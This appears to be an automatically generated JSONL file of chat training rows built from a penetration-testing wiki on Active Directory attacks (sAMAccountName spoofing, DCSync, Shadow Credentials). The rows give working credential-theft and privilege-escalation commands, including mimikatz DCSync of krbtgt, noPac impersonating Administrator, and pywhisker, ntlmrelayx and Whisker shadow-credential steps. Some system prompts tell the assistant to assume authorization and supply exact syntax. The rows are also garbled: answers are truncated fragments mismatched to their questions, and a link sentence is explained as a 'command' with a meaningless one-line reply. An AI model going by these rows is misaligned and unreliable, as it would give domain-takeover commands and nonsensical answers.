/domain:mcafeelab.local /all\n`\n\n:::\n\n> [!WARNING]\n> In the screenshot below, the -spn argument is used in the getST.py command. The option is to be replaced with -altservice`.\n\n![](<./assets/sAMAccountName spoofing example.png>)\nsAMAccountName spoofing example{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 6. DCSync?", "response": "(mimikatz) lsadump::dcsync /domain:domain.local /kdc:DomainController.domain.local /user:krbtgt \n``\n\nnoPac (C#) is an automated alternative that can be used to scan and abuse unpatched targets.\n\n`powershell\nnoPac.exe scan -domain domain.local -user \"lowpriv\" -pass \"lowpriv\"\nnoPac.exe -domain mcafeelab.local -user \"lowpriv\" -pass \"lowpriv\" /dc dc.domain.local /mAccount pillemann11 /mPassword pilleman11 /service ldaps /ptt /impersonate Administrator\n(mimikatz) lsadump::dcsync /domain:mcafeelab.local /all\n`\n\n:::\n\n> [!WARNING]\n> In the screenshot below, the -spn argument is used in the getST.py command. The option is to be replaced with -altservice`.\n\n![](<./assets/sAMAccountName spoofing example.png>)\nsAMAccountName spoofing example{.caption}", "metadata": {"corpus_index": 727, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 6. DCSync?"}, {"role": "assistant", "content": "(mimikatz) lsadump::dcsync /domain:domain.local /kdc:DomainController.domain.local /user:krbtgt \n``\n\nnoPac (C#) is an automated alternative that can be used to scan and abuse unpatched targets.\n\n`powershell\nnoPac.exe scan -domain domain.local -user \"lowpriv\" -pass \"lowpriv\"\nnoPac.exe -domain mcafeelab.local -user \"lowpriv\" -pass \"lowpriv\" /dc dc.domain.local /mAccount pillemann11 /mPassword pilleman11 /service ldaps /ptt /impersonate Administrator\n(mimikatz) lsadump::dcsync /domain:mcafeelab.local /all\n`\n\n:::\n\n> [!WARNING]\n> In the screenshot below, the -spn argument is used in the getST.py command. The option is to be replaced with -altservice`.\n\n![](<./assets/sAMAccountName spoofing example.png>)\nsAMAccountName spoofing example{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 6. DCSync?", "response": "(mimikatz) lsadump::dcsync /domain:domain.local /kdc:DomainController.domain.local /user:krbtgt \n``\n\nnoPac (C#) is an automated alternative that can be used to scan and abuse unpatched targets.\n\n`powershell\nnoPac.exe scan -domain domain.local -user \"lowpriv\" -pass \"lowpriv\"\nnoPac.exe -domain mcafeelab.local -user \"lowpriv\" -pass \"lowpriv\" /dc dc.domain.local /mAccount pillemann11 /mPassword pilleman11 /service ldaps /ptt /impersonate Administrator\n(mimikatz) lsadump::dcsync /domain:mcafeelab.local /all\n`\n\n:::\n\n> [!WARNING]\n> In the screenshot below, the -spn argument is used in the getST.py command. The option is to be replaced with -altservice`.\n\n![](<./assets/sAMAccountName spoofing example.png>)\nsAMAccountName spoofing example{.caption}", "metadata": {"corpus_index": 727, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 6. DCSync"}, {"role": "assistant", "content": "[noPac](https://github.com/cube0x0/noPac) (C#) is an automated alternative that can be used to scan and abuse unpatched targets."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 6. DCSync", "response": "[noPac](https://github.com/cube0x0/noPac) (C#) is an automated alternative that can be used to scan and abuse unpatched targets.", "metadata": {"corpus_index": 728, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `[noPac](https://github.com/cube0x0/noPac) (C#) is an automated alternative that can be used to scan and abuse unpatched targets.`?"}, {"role": "assistant", "content": "This command is used for 6. dcsync. 6. DCSync"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `[noPac](https://github.com/cube0x0/noPac) (C#) is an automated alternative that can be used to scan and abuse unpatched targets.`?", "response": "This command is used for 6. dcsync. 6. DCSync", "metadata": {"corpus_index": 728, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain sAMAccountName spoofing - User account"}, {"role": "assistant", "content": "An alternative to using computer accounts is to have enough permissions against a user account (cf. Access Controls abuse) to edit its sAMAccountName attribute (i.e. WriteProperty on the attribute, or on the « general information » or « public information » property sets, or GenericWrite, or GenericAll).\n\nThis attack path also requires knowledge of the user account password or hash (to obtain a TGT), which can be obtained (or set) in many ways (e.g. Targeted Kerberoasting, Shadow Credentials, Forced Password Change).\n\nAppart from the computer account creation and SPNs manipulation, the exploitation steps are the same as with a machine account. If the account has SPNs that point to its name, they will have to be removed for the renaming operation to work."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain sAMAccountName spoofing - User account", "response": "An alternative to using computer accounts is to have enough permissions against a user account (cf. Access Controls abuse) to edit its sAMAccountName attribute (i.e. WriteProperty on the attribute, or on the « general information » or « public information » property sets, or GenericWrite, or GenericAll).\n\nThis attack path also requires knowledge of the user account password or hash (to obtain a TGT), which can be obtained (or set) in many ways (e.g. Targeted Kerberoasting, Shadow Credentials, Forced Password Change).\n\nAppart from the computer account creation and SPNs manipulation, the exploitation steps are the same as with a machine account. If the account has SPNs that point to its name, they will have to be removed for the renaming operation to work.", "metadata": {"corpus_index": 729, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for sAMAccountName spoofing - User account?"}, {"role": "assistant", "content": "An alternative to using computer accounts is to have enough permissions against a user account (cf. Access Controls abuse) to edit its sAMAccountName attribute (i.e. WriteProperty on the attribute, or on the « general information » or « public information » property sets, or GenericWrite, or GenericAll).\n\nThis attack path also requires knowledge of the user account password or hash (to obtain a TGT), which can be obtained (or set) in many ways (e.g. Targeted Kerberoasting, Shadow Credentials, Forced Password Change).\n\nAppart from the computer account creation and SPNs manipulation, the exploitation steps are the same as with a machine account. If the account has SPNs that point to its name, they will have to be removed for the renaming operation to work."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for sAMAccountName spoofing - User account?", "response": "An alternative to using computer accounts is to have enough permissions against a user account (cf. Access Controls abuse) to edit its sAMAccountName attribute (i.e. WriteProperty on the attribute, or on the « general information » or « public information » property sets, or GenericWrite, or GenericAll).\n\nThis attack path also requires knowledge of the user account password or hash (to obtain a TGT), which can be obtained (or set) in many ways (e.g. Targeted Kerberoasting, Shadow Credentials, Forced Password Change).\n\nAppart from the computer account creation and SPNs manipulation, the exploitation steps are the same as with a machine account. If the account has SPNs that point to its name, they will have to be removed for the renaming operation to work.", "metadata": {"corpus_index": 729, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Shadow Credentials - Practice"}, {"role": "assistant", "content": "In order to exploit that technique, the attacker needs to:\n\n1. be in a domain that supports PKINIT and containing at least one Domain Controller running Windows Server 2016 or above.\n2. be in a domain where the Domain Controller(s) has its own key pair (for the session key exchange) (e.g. happens when AD CS is enabled or when a certificate authority (CA) is in place).\n3. have control over an account that can edit the target object's msDs-KeyCredentialLink attribute.\n\n> [!TIP]\n> The msDS-KeyCredentialLink feature was introduced with Windows Server 2016. However, this is not to be confused with PKINIT which was already present in Windows 2000. The msDS-KeyCredentialLink feature allows to link an X509 certificate to a domain object, that's all.\n\nIf those per-requisites are met, an attacker can\n\n1. create an RSA key pair\n2. create an X509 certificate configured with the public key\n3. create a KeyCredential structure featuring the raw public key and add it to the msDs-KeyCredentialLink attribute\n4. authenticate using PKINIT and the certificate and private key\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the msDs-KeyCredentialLink attribute of a user or computer target can be manipulated with the pyWhisker tool.\n\n``bash\npywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"\n`\n\n> [!SUCCESS]\n> The add action from pywhisker is featured in ntlmrelayx.\n> \n> `bash\n> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'\n> `\n\nWhen the public key has been set in the msDs-KeyCredentialLink of the target, the certificate generated can be used with Pass-the-Certificate to obtain a TGT and further access.\n\n=== Windows\n\nFrom Windows systems, the msDs-KeyCredentialLink attribute of a target user or computer can be manipulated with the Whisker tool.\n\n`powershell\nWhisker.exe add /target:\"TARGET_SAMNAME\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nIt can also be done with the Invok"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Shadow Credentials - Practice", "response": "In order to exploit that technique, the attacker needs to:\n\n1. be in a domain that supports PKINIT and containing at least one Domain Controller running Windows Server 2016 or above.\n2. be in a domain where the Domain Controller(s) has its own key pair (for the session key exchange) (e.g. happens when AD CS is enabled or when a certificate authority (CA) is in place).\n3. have control over an account that can edit the target object's msDs-KeyCredentialLink attribute.\n\n> [!TIP]\n> The msDS-KeyCredentialLink feature was introduced with Windows Server 2016. However, this is not to be confused with PKINIT which was already present in Windows 2000. The msDS-KeyCredentialLink feature allows to link an X509 certificate to a domain object, that's all.\n\nIf those per-requisites are met, an attacker can\n\n1. create an RSA key pair\n2. create an X509 certificate configured with the public key\n3. create a KeyCredential structure featuring the raw public key and add it to the msDs-KeyCredentialLink attribute\n4. authenticate using PKINIT and the certificate and private key\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the msDs-KeyCredentialLink attribute of a user or computer target can be manipulated with the pyWhisker tool.\n\n``bash\npywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"\n`\n\n> [!SUCCESS]\n> The add action from pywhisker is featured in ntlmrelayx.\n> \n> `bash\n> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'\n> `\n\nWhen the public key has been set in the msDs-KeyCredentialLink of the target, the certificate generated can be used with Pass-the-Certificate to obtain a TGT and further access.\n\n=== Windows\n\nFrom Windows systems, the msDs-KeyCredentialLink attribute of a target user or computer can be manipulated with the Whisker tool.\n\n`powershell\nWhisker.exe add /target:\"TARGET_SAMNAME\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nIt can also be done with the Invok", "metadata": {"corpus_index": 730, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Shadow Credentials - Practice"}, {"role": "assistant", "content": "In order to exploit that technique, the attacker needs to:\n\n1. be in a domain that supports PKINIT and containing at least one Domain Controller running Windows Server 2016 or above.\n2. be in a domain where the Domain Controller(s) has its own key pair (for the session key exchange) (e.g. happens when AD CS is enabled or when a certificate authority (CA) is in place).\n3. have control over an account that can edit the target object's msDs-KeyCredentialLink attribute.\n\n> [!TIP]\n> The msDS-KeyCredentialLink feature was introduced with Windows Server 2016. However, this is not to be confused with PKINIT which was already present in Windows 2000. The msDS-KeyCredentialLink feature allows to link an X509 certificate to a domain object, that's all.\n\nIf those per-requisites are met, an attacker can\n\n1. create an RSA key pair\n2. create an X509 certificate configured with the public key\n3. create a KeyCredential structure featuring the raw public key and add it to the msDs-KeyCredentialLink attribute\n4. authenticate using PKINIT and the certificate and private key\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the msDs-KeyCredentialLink attribute of a user or computer target can be manipulated with the pyWhisker tool.\n\n``bash\npywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"\n`\n\n> [!SUCCESS]\n> The add action from pywhisker is featured in ntlmrelayx.\n> \n> `bash\n> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'\n> `\n\nWhen the public key has been set in the msDs-KeyCredentialLink of the target, the certificate generated can be used with Pass-the-Certificate to obtain a TGT and further access.\n\n=== Windows\n\nFrom Windows systems, the msDs-KeyCredentialLink attribute of a target user or computer can be manipulated with the Whisker tool.\n\n`powershell\nWhisker.exe add /target:\"TARGET_SAMNAME\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nIt can also be done with the Invok"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Shadow Credentials - Practice", "response": "In order to exploit that technique, the attacker needs to:\n\n1. be in a domain that supports PKINIT and containing at least one Domain Controller running Windows Server 2016 or above.\n2. be in a domain where the Domain Controller(s) has its own key pair (for the session key exchange) (e.g. happens when AD CS is enabled or when a certificate authority (CA) is in place).\n3. have control over an account that can edit the target object's msDs-KeyCredentialLink attribute.\n\n> [!TIP]\n> The msDS-KeyCredentialLink feature was introduced with Windows Server 2016. However, this is not to be confused with PKINIT which was already present in Windows 2000. The msDS-KeyCredentialLink feature allows to link an X509 certificate to a domain object, that's all.\n\nIf those per-requisites are met, an attacker can\n\n1. create an RSA key pair\n2. create an X509 certificate configured with the public key\n3. create a KeyCredential structure featuring the raw public key and add it to the msDs-KeyCredentialLink attribute\n4. authenticate using PKINIT and the certificate and private key\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the msDs-KeyCredentialLink attribute of a user or computer target can be manipulated with the pyWhisker tool.\n\n``bash\npywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"\n`\n\n> [!SUCCESS]\n> The add action from pywhisker is featured in ntlmrelayx.\n> \n> `bash\n> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'\n> `\n\nWhen the public key has been set in the msDs-KeyCredentialLink of the target, the certificate generated can be used with Pass-the-Certificate to obtain a TGT and further access.\n\n=== Windows\n\nFrom Windows systems, the msDs-KeyCredentialLink attribute of a target user or computer can be manipulated with the Whisker tool.\n\n`powershell\nWhisker.exe add /target:\"TARGET_SAMNAME\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nIt can also be done with the Invok", "metadata": {"corpus_index": 730, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the pywhisker.py syntax for shadow credentials - practice?"}, {"role": "assistant", "content": "pywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the pywhisker.py syntax for shadow credentials - practice?", "response": "pywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"", "metadata": {"corpus_index": 731, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "pywhisker.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Shadow Credentials - Practice"}, {"role": "assistant", "content": "pywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Shadow Credentials - Practice", "response": "pywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"", "metadata": {"corpus_index": 731, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `pywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"`?"}, {"role": "assistant", "content": "This command is used for shadow credentials - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `pywhisker.py -d \"FQDN_DOMAIN\" -u \"USER\" -p \"PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"`?", "response": "This command is used for shadow credentials - practice. Practice", "metadata": {"corpus_index": 731, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use ntlmrelayx for shadow credentials - practice?"}, {"role": "assistant", "content": "> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'\n> ```\n\nWhen the public key has been set in the `msDs-KeyCredentialLink` of the target, the certificate generated can be used with [Pass-the-Certificate](pass-the-certificate.md) to obtain a TGT and further access.\n\n\n=== Windows\n\nFrom Windows systems, the `msDs-KeyCredentialLink` attribute of a target user or computer can be manipulated with the [Whisker](https://github.com/eladshamir/Whisker) tool."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use ntlmrelayx for shadow credentials - practice?", "response": "> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'\n> ```\n\nWhen the public key has been set in the `msDs-KeyCredentialLink` of the target, the certificate generated can be used with [Pass-the-Certificate](pass-the-certificate.md) to obtain a TGT and further access.\n\n\n=== Windows\n\nFrom Windows systems, the `msDs-KeyCredentialLink` attribute of a target user or computer can be manipulated with the [Whisker](https://github.com/eladshamir/Whisker) tool.", "metadata": {"corpus_index": 732, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Shadow Credentials - Practice?"}, {"role": "assistant", "content": "> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'\n> ```\n\nWhen the public key has been set in the `msDs-KeyCredentialLink` of the target, the certificate generated can be used with [Pass-the-Certificate](pass-the-certificate.md) to obtain a TGT and further access.\n\n\n=== Windows\n\nFrom Windows systems, the `msDs-KeyCredentialLink` attribute of a target user or computer can be manipulated with the [Whisker](https://github.com/eladshamir/Whisker) tool."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Shadow Credentials - Practice?", "response": "> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'\n> ```\n\nWhen the public key has been set in the `msDs-KeyCredentialLink` of the target, the certificate generated can be used with [Pass-the-Certificate](pass-the-certificate.md) to obtain a TGT and further access.\n\n\n=== Windows\n\nFrom Windows systems, the `msDs-KeyCredentialLink` attribute of a target user or computer can be manipulated with the [Whisker](https://github.com/eladshamir/Whisker) tool.", "metadata": {"corpus_index": 732, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`?"}, {"role": "assistant", "content": "This command is used for shadow credentials - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`?", "response": "This command is used for shadow credentials - practice. Practice", "metadata": {"corpus_index": 732, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the It command to shadow credentials - practice"}, {"role": "assistant", "content": "It can also be done with the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) tool.\n\n> Note: the README contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the It command to shadow credentials - practice", "response": "It can also be done with the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) tool.\n\n> Note: the README contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)", "metadata": {"corpus_index": 733, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "It"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Shadow Credentials - Practice"}, {"role": "assistant", "content": "It can also be done with the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) tool.\n\n> Note: the README contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Shadow Credentials - Practice", "response": "It can also be done with the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) tool.\n\n> Note: the README contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)", "metadata": {"corpus_index": 733, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `It can also be done with the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) tool.`?"}, {"role": "assistant", "content": "This command is used for shadow credentials - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `It can also be done with the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) tool.`?", "response": "This command is used for shadow credentials - practice. Practice", "metadata": {"corpus_index": 733, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain List the keys of a principal (not specifying -Object switch would list all targets with an msDs-KeyCredentialLink attribute)"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'ShadowCreds' -Object 'CN=John JD. DOE,CN=Users,DC=ADLAB,DC=LOCAL'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain List the keys of a principal (not specifying -Object switch would list all targets with an msDs-KeyCredentialLink attribute)", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'ShadowCreds' -Object 'CN=John JD. DOE,CN=Users,DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 734, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for List the keys of a principal (not specifying -Object switch would list all targets with an msDs-KeyCredentialLink attribute)?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'ShadowCreds' -Object 'CN=John JD. DOE,CN=Users,DC=ADLAB,DC=LOCAL'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for List the keys of a principal (not specifying -Object switch would list all targets with an msDs-KeyCredentialLink attribute)?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'ShadowCreds' -Object 'CN=John JD. 